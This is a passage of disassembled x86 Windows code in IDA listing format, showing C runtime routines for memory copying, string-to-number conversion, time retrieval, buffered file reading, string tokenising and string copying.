rep movsd
jmp off_416468[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4163FC dd offset loc_41645F ; DATA XREF: sub_416320:loc_41637C�r
dd offset loc_41644C
dd offset loc_416444
dd offset loc_41643C
dd offset loc_416434
dd offset loc_41642C
dd offset loc_416424
dd offset loc_41641C
; ---------------------------------------------------------------------------
loc_41641C: ; CODE XREF: sub_416320:loc_41637C�j
; DATA XREF: sub_416320+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_416424: ; CODE XREF: sub_416320:loc_41637C�j
; DATA XREF: sub_416320+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41642C: ; CODE XREF: sub_416320:loc_41637C�j
; DATA XREF: sub_416320+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_416434: ; CODE XREF: sub_416320:loc_41637C�j
; DATA XREF: sub_416320+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41643C: ; CODE XREF: sub_416320:loc_41637C�j
; DATA XREF: sub_416320+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_416444: ; CODE XREF: sub_416320:loc_41637C�j
; DATA XREF: sub_416320+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41644C: ; CODE XREF: sub_416320:loc_41637C�j
; DATA XREF: sub_416320+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41645F: ; CODE XREF: sub_416320:loc_41637C�j
; DATA XREF: sub_416320:off_4163FC�o
jmp off_416468[edx*4]
; ---------------------------------------------------------------------------
align 4
off_416468 dd offset loc_416478 ; DATA XREF: sub_416320+35�r
; sub_416320+92�r ...
dd offset loc_416480
dd offset loc_41648C
dd offset loc_4164A0
; ---------------------------------------------------------------------------
loc_416478: ; CODE XREF: sub_416320+35�j
; sub_416320+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_416480: ; CODE XREF: sub_416320+35�j
; sub_416320+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41648C: ; CODE XREF: sub_416320+35�j
; sub_416320+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4164A0: ; CODE XREF: sub_416320+35�j
; sub_416320+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4164B8: ; CODE XREF: sub_416320+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4164EC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4164E0
std
rep movsd
cld
jmp off_416600[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4164E0: ; CODE XREF: sub_416320+1B1�j
; sub_416320+208�j ...
neg ecx
jmp off_4165B0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4164EC: ; CODE XREF: sub_416320+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_416504
and eax, 3
sub ecx, eax
jmp dword ptr loc_416504+4[eax*4]
; ---------------------------------------------------------------------------
loc_416504: ; CODE XREF: sub_416320+1D6�j
; DATA XREF: sub_416320+1DD�r
jmp off_416600[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_416517+1
; ---------------------------------------------------------------------------
cmp [ebp+arg_39], ah
add [eax+65h], ah
inc ecx
loc_416517: ; DATA XREF: sub_416320+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_4164E0
std
rep movsd
cld
jmp off_416600[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_4164E0
std
rep movsd
cld
jmp off_416600[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_4164E0
std
rep movsd
cld
jmp off_416600[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4165B4
dd offset loc_4165BC
dd offset loc_4165C4
dd offset loc_4165CC
dd offset loc_4165D4
dd offset loc_4165DC
dd offset loc_4165E4
off_4165B0 dd offset loc_4165F7 ; DATA XREF: sub_416320+1C2�r
; ---------------------------------------------------------------------------
loc_4165B4: ; DATA XREF: sub_416320+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4165BC: ; DATA XREF: sub_416320+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4165C4: ; DATA XREF: sub_416320+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4165CC: ; DATA XREF: sub_416320+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4165D4: ; DATA XREF: sub_416320+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_4165DC: ; DATA XREF: sub_416320+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_4165E4: ; DATA XREF: sub_416320+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4165F7: ; CODE XREF: sub_416320+1C2�j
; DATA XREF: sub_416320:off_4165B0�o
jmp off_416600[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_416600 dd offset loc_416610 ; DATA XREF: sub_416320+1B7�r
; sub_416320:loc_416504�r ...
dd offset loc_416618
dd offset loc_416628
dd offset loc_41663C
; ---------------------------------------------------------------------------
loc_416610: ; CODE XREF: sub_416320+1B7�j
; sub_416320:loc_416504�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_416618: ; CODE XREF: sub_416320+1B7�j
; sub_416320:loc_416504�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_416628: ; CODE XREF: sub_416320+1B7�j
; sub_416320:loc_416504�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41663C: ; CODE XREF: sub_416320+1B7�j
; sub_416320:loc_416504�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_416320 endp
; =============== S U B R O U T I N E =======================================
sub_416655 proc near ; CODE XREF: sub_404DB8+34�p
; sub_404DB8+4F�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_415BFB
pop ecx
pop ecx
retn
sub_416655 endp
; =============== S U B R O U T I N E =======================================
sub_416663 proc near ; CODE XREF: sub_4166D0+4�p
arg_0 = dword ptr 4
push esi
push dword_46D17C
call sub_41B4D8
mov edx, dword_46D17C
pop ecx
mov ecx, dword_46D178
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
pop esi
jnb short loc_4166C2
push edx
call sub_41B4D8
add eax, 10h
push eax
push dword_46D17C
call sub_41737F
add esp, 0Ch
test eax, eax
jnz short loc_4166A5
retn
; ---------------------------------------------------------------------------
loc_4166A5: ; CODE XREF: sub_416663+3F�j
mov ecx, dword_46D178
sub ecx, dword_46D17C
mov dword_46D17C, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_46D178, ecx
loc_4166C2: ; CODE XREF: sub_416663+23�j
mov eax, [esp+arg_0]
mov [ecx], eax
add dword_46D178, 4
retn
sub_416663 endp
; =============== S U B R O U T I N E =======================================
sub_4166D0 proc near ; CODE XREF: sub_404EA5+1A�p
; sub_4209EE+5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_416663
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_4166D0 endp
; =============== S U B R O U T I N E =======================================
sub_4166E2 proc near ; DATA XREF: .text:00423018�o
push 80h
call sub_415BE9
test eax, eax
pop ecx
mov dword_46D17C, eax
jnz short loc_416703
push 18h
call sub_417C0E
mov eax, dword_46D17C
pop ecx
loc_416703: ; CODE XREF: sub_4166E2+12�j
and dword ptr [eax], 0
mov eax, dword_46D17C
mov dword_46D178, eax
retn
sub_4166E2 endp
; =============== S U B R O U T I N E =======================================
sub_416711 proc near ; CODE XREF: sub_418AD0+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_416728
add esp, 10h
retn
sub_416711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416728 proc near ; CODE XREF: sub_416711+E�p
; sub_416930+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_416740: ; CODE XREF: sub_416728+46�j
cmp dword_4385FC, 1
jle short loc_416758
movzx eax, bl
push 8
push eax
call sub_418576
pop ecx
pop ecx
jmp short loc_416767
; ---------------------------------------------------------------------------
loc_416758: ; CODE XREF: sub_416728+1F�j
mov ecx, off_4383F0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_416767: ; CODE XREF: sub_416728+2E�j
test eax, eax
jz short loc_416770
mov bl, [esi]
inc esi
jmp short loc_416740
; ---------------------------------------------------------------------------
loc_416770: ; CODE XREF: sub_416728+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_41677E
or [ebp+arg_C], 2
jmp short loc_416783
; ---------------------------------------------------------------------------
loc_41677E: ; CODE XREF: sub_416728+4E�j
cmp bl, 2Bh
jnz short loc_416789
loc_416783: ; CODE XREF: sub_416728+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_416789: ; CODE XREF: sub_416728+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_416920
cmp eax, 1
jz loc_416920
cmp eax, 24h
jg loc_416920
push 10h
test eax, eax
pop ecx
jnz short loc_4167D1
cmp bl, 30h
jz short loc_4167BB
mov [ebp+arg_8], 0Ah
jmp short loc_4167ED
; ---------------------------------------------------------------------------
loc_4167BB: ; CODE XREF: sub_416728+88�j
mov al, [esi]
cmp al, 78h
jz short loc_4167CE
cmp al, 58h
jz short loc_4167CE
mov [ebp+arg_8], 8
jmp short loc_4167ED
; ---------------------------------------------------------------------------
loc_4167CE: ; CODE XREF: sub_416728+97�j
; sub_416728+9B�j
mov [ebp+arg_8], ecx
loc_4167D1: ; CODE XREF: sub_416728+83�j
cmp [ebp+arg_8], ecx
jnz short loc_4167ED
cmp bl, 30h
jnz short loc_4167ED
mov al, [esi]
cmp al, 78h
jz short loc_4167E5
cmp al, 58h
jnz short loc_4167ED
loc_4167E5: ; CODE XREF: sub_416728+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_4167ED: ; CODE XREF: sub_416728+91�j
; sub_416728+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_4167FD: ; CODE XREF: sub_416728+16C�j
cmp dword_4385FC, 1
movzx esi, bl
jle short loc_416815
push 4
push esi
call sub_418576
pop ecx
pop ecx
jmp short loc_416820
; ---------------------------------------------------------------------------
loc_416815: ; CODE XREF: sub_416728+DF�j
mov eax, off_4383F0
mov al, [eax+esi*2]
and eax, 4
loc_416820: ; CODE XREF: sub_416728+EB�j
test eax, eax
jz short loc_41682C
movsx ecx, bl
sub ecx, 30h
jmp short loc_41685E
; ---------------------------------------------------------------------------
loc_41682C: ; CODE XREF: sub_416728+FA�j
cmp dword_4385FC, 1
jle short loc_416840
push edi
push esi
call sub_418576
pop ecx
pop ecx
jmp short loc_41684B
; ---------------------------------------------------------------------------
loc_416840: ; CODE XREF: sub_416728+10B�j
mov eax, off_4383F0
mov ax, [eax+esi*2]
and eax, edi
loc_41684B: ; CODE XREF: sub_416728+116�j
test eax, eax
jz short loc_416899
movsx eax, bl
push eax
call sub_41B539
pop ecx
mov ecx, eax
sub ecx, 37h
loc_41685E: ; CODE XREF: sub_416728+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_416899
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_416883
jnz short loc_41687D
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_416883
loc_41687D: ; CODE XREF: sub_416728+147�j
or [ebp+arg_C], 4
jmp short loc_41688C
; ---------------------------------------------------------------------------
loc_416883: ; CODE XREF: sub_416728+145�j
; sub_416728+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_41688C: ; CODE XREF: sub_416728+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_4167FD
; ---------------------------------------------------------------------------
loc_416899: ; CODE XREF: sub_416728+125�j
; sub_416728+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_4168B7
test edx, edx
jz short loc_4168B1
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4168B1: ; CODE XREF: sub_416728+181�j
and [ebp+var_8], 0
jmp short loc_416904
; ---------------------------------------------------------------------------
loc_4168B7: ; CODE XREF: sub_416728+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_4168DD
test cl, 1
jnz short loc_416904
and ecx, 2
jz short loc_4168D4
cmp [ebp+var_8], 80000000h
ja short loc_4168DD
loc_4168D4: ; CODE XREF: sub_416728+1A1�j
test ecx, ecx
jnz short loc_416904
cmp [ebp+var_8], eax
jbe short loc_416904
loc_4168DD: ; CODE XREF: sub_416728+197�j
; sub_416728+1AA�j
test byte ptr [ebp+arg_C], 1
mov dword_46BB04, 22h
jz short loc_4168F3
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_416904
; ---------------------------------------------------------------------------
loc_4168F3: ; CODE XREF: sub_416728+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
loc_416904: ; CODE XREF: sub_416728+18D�j
; sub_416728+19C�j ...
test edx, edx
jz short loc_41690D
mov eax, [ebp+var_4]
mov [edx], eax
loc_41690D: ; CODE XREF: sub_416728+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_41691B
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_41691B: ; CODE XREF: sub_416728+1E9�j
mov eax, [ebp+var_8]
jmp short loc_41692B
; ---------------------------------------------------------------------------
loc_416920: ; CODE XREF: sub_416728+66�j
; sub_416728+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_416929
mov [eax], edi
loc_416929: ; CODE XREF: sub_416728+1FD�j
xor eax, eax
loc_41692B: ; CODE XREF: sub_416728+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_416728 endp
; =============== S U B R O U T I N E =======================================
sub_416930 proc near ; CODE XREF: sub_405398+4A6�p
; sub_40CD3A+359E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_416728
add esp, 10h
retn
sub_416930 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416947 proc near ; CODE XREF: sub_405398+24C�p
; sub_405398+450�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_415B10
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_41B605
add esp, 10h
leave
retn
sub_416947 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41697B proc near ; CODE XREF: sub_405398+4E�p
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call dword_42105C ; GetLocalTime
lea eax, [ebp+var_20]
push eax
call dword_42115C ; GetSystemTime
mov ax, [ebp+var_16]
cmp ax, word_46BAFA
jnz short loc_4169E0
mov ax, [ebp+var_18]
cmp ax, word_46BAF8
jnz short loc_4169E0
mov ax, [ebp+var_1A]
cmp ax, word_46BAF6
jnz short loc_4169E0
mov ax, [ebp+var_1E]
cmp ax, word_46BAF2
jnz short loc_4169E0
mov ax, [ebp+var_20]
cmp ax, word_46BAF0
jnz short loc_4169E0
mov eax, dword_46BAE8
jmp short loc_416A25
; ---------------------------------------------------------------------------
loc_4169E0: ; CODE XREF: sub_41697B+28�j
; sub_41697B+35�j ...
lea eax, [ebp+var_CC]
push eax
call dword_421158 ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz short loc_416A0D
cmp eax, 2
jnz short loc_416A09
cmp [ebp+var_32], 0
jz short loc_416A09
cmp [ebp+var_24], 0
jz short loc_416A09
push 1
pop eax
jmp short loc_416A10
; ---------------------------------------------------------------------------
loc_416A09: ; CODE XREF: sub_41697B+7A�j
; sub_41697B+81�j ...
xor eax, eax
jmp short loc_416A10
; ---------------------------------------------------------------------------
loc_416A0D: ; CODE XREF: sub_41697B+75�j
or eax, 0FFFFFFFFh
loc_416A10: ; CODE XREF: sub_41697B+8C�j
; sub_41697B+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_46BAF0
movsd
movsd
movsd
movsd
pop edi
mov dword_46BAE8, eax
pop esi
loc_416A25: ; CODE XREF: sub_41697B+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_41C0B6
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_416A55
mov [ecx], eax
locret_416A55: ; CODE XREF: sub_41697B+D6�j
leave
retn
sub_41697B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416A57 proc near ; CODE XREF: sub_4059FC+4E�p
; sub_406B84+30E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_416A7B
xor eax, eax
jmp loc_416B24
; ---------------------------------------------------------------------------
loc_416A7B: ; CODE XREF: sub_416A57+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_416A8E
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_416A9A
; ---------------------------------------------------------------------------
loc_416A8E: ; CODE XREF: sub_416A57+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_416A9A
; ---------------------------------------------------------------------------
loc_416A97: ; CODE XREF: sub_416A57+C4�j
mov ecx, [ebp+arg_0]
loc_416A9A: ; CODE XREF: sub_416A57+35�j
; sub_416A57+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_416ACC
mov eax, [esi+4]
test eax, eax
jz short loc_416ACC
cmp ecx, eax
mov edi, ecx
jb short loc_416AB1
mov edi, eax
loc_416AB1: ; CODE XREF: sub_416A57+56�j
push edi
push dword ptr [esi]
push ebx
call sub_4153F0
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_416B17
; ---------------------------------------------------------------------------
loc_416ACC: ; CODE XREF: sub_416A57+49�j
; sub_416A57+50�j
cmp ecx, [ebp+arg_C]
jb short loc_416AFF
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_416AE2
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_416AE2: ; CODE XREF: sub_416A57+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41C251
add esp, 0Ch
test eax, eax
jz short loc_416B29
cmp eax, 0FFFFFFFFh
jz short loc_416B2F
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_416B17
; ---------------------------------------------------------------------------
loc_416AFF: ; CODE XREF: sub_416A57+78�j
push esi
call sub_41C178
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_416B33
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_416B17: ; CODE XREF: sub_416A57+73�j
; sub_416A57+A6�j
cmp [ebp+arg_0], 0
jnz loc_416A97
mov eax, [ebp+arg_8]
loc_416B24: ; CODE XREF: sub_416A57+1F�j
; sub_416A57+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416B29: ; CODE XREF: sub_416A57+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_416B33
; ---------------------------------------------------------------------------
loc_416B2F: ; CODE XREF: sub_416A57+9F�j
or dword ptr [esi+0Ch], 20h
loc_416B33: ; CODE XREF: sub_416A57+B2�j
; sub_416A57+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_416B24
sub_416A57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416B3F proc near ; CODE XREF: sub_405A96+2A1�p
; sub_406048+100�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_416B58: ; CODE XREF: sub_416B3F+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_416B58
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_416B80
mov edx, dword_46BB00
loc_416B80: ; CODE XREF: sub_416B3F+39�j
; sub_416B3F+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_416BA0
test al, al
jz short loc_416BA0
inc edx
jmp short loc_416B80
; ---------------------------------------------------------------------------
loc_416BA0: ; CODE XREF: sub_416B3F+58�j
; sub_416B3F+5C�j
mov ebx, edx
loc_416BA2: ; CODE XREF: sub_416B3F+81�j
mov al, [edx]
test al, al
jz short loc_416BC6
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_416BC2
inc edx
jmp short loc_416BA2
; ---------------------------------------------------------------------------
loc_416BC2: ; CODE XREF: sub_416B3F+7E�j
and byte ptr [edx], 0
inc edx
loc_416BC6: ; CODE XREF: sub_416B3F+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_46BB00, edx
and eax, ebx
pop ebx
leave
retn
sub_416B3F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416BE0 proc near ; CODE XREF: sub_4062F7+1B3�p
; sub_4071B6+6E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_416C63
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_416C04
shr ecx, 2
jnz short loc_416C71
jmp short loc_416C25
; ---------------------------------------------------------------------------
loc_416C04: ; CODE XREF: sub_416BE0+1B�j
; sub_416BE0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_416C32
test al, al
jz short loc_416C3A
test esi, 3
jnz short loc_416C04
mov ebx, ecx
shr ecx, 2
jnz short loc_416C71
loc_416C20: ; CODE XREF: sub_416BE0+8F�j
and ebx, 3
jz short loc_416C32
loc_416C25: ; CODE XREF: sub_416BE0+22�j
; sub_416BE0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_416C5E
dec ebx
jnz short loc_416C25
loc_416C32: ; CODE XREF: sub_416BE0+2B�j
; sub_416BE0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_416C3A: ; CODE XREF: sub_416BE0+2F�j
test edi, 3
jz short loc_416C54
loc_416C42: ; CODE XREF: sub_416BE0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_416CD6
test edi, 3
jnz short loc_416C42
loc_416C54: ; CODE XREF: sub_416BE0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_416CC7
loc_416C5B: ; CODE XREF: sub_416BE0+7F�j
; sub_416BE0+F4�j
mov [edi], al
inc edi
loc_416C5E: ; CODE XREF: sub_416BE0+4D�j
dec ebx
jnz short loc_416C5B
pop ebx
pop esi
loc_416C63: ; CODE XREF: sub_416BE0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_416C69: ; CODE XREF: sub_416BE0+A9�j
; sub_416BE0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_416C20
loc_416C71: ; CODE XREF: sub_416BE0+20�j
; sub_416BE0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_416C69
test dl, dl
jz short loc_416CBB
test dh, dh
jz short loc_416CB1
test edx, 0FF0000h
jz short loc_416CA7
test edx, 0FF000000h
jnz short loc_416C69
mov [edi], edx
jmp short loc_416CBF
; ---------------------------------------------------------------------------
loc_416CA7: ; CODE XREF: sub_416BE0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_416CBF
; ---------------------------------------------------------------------------
loc_416CB1: ; CODE XREF: sub_416BE0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_416CBF
; ---------------------------------------------------------------------------
loc_416CBB: ; CODE XREF: sub_416BE0+AD�j
xor edx, edx
mov [edi], edx
loc_416CBF: ; CODE XREF: sub_416BE0+C5�j
; sub_416BE0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_416CD1
loc_416CC7: ; CODE XREF: sub_416BE0+79�j
xor eax, eax
loc_416CC9: ; CODE XREF: sub_416BE0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_416CC9
loc_416CD1: ; CODE XREF: sub_416BE0+E5�j
and ebx, 3
jnz short loc_416C5B
loc_416CD6: ; CODE XREF: sub_416BE0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_416BE0 endp
; =============== S U B R O U T I N E =======================================
sub_416CDE proc near ; CODE XREF: sub_406B84+2E2�p
; sub_406B84+42F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_416D5A
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_416CFD
cmp edi, 1
jz short loc_416CFD
cmp edi, 2
jnz short loc_416D5A
loc_416CFD: ; CODE XREF: sub_416CDE+13�j
; sub_416CDE+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_416D14
push esi
call sub_41C4E1
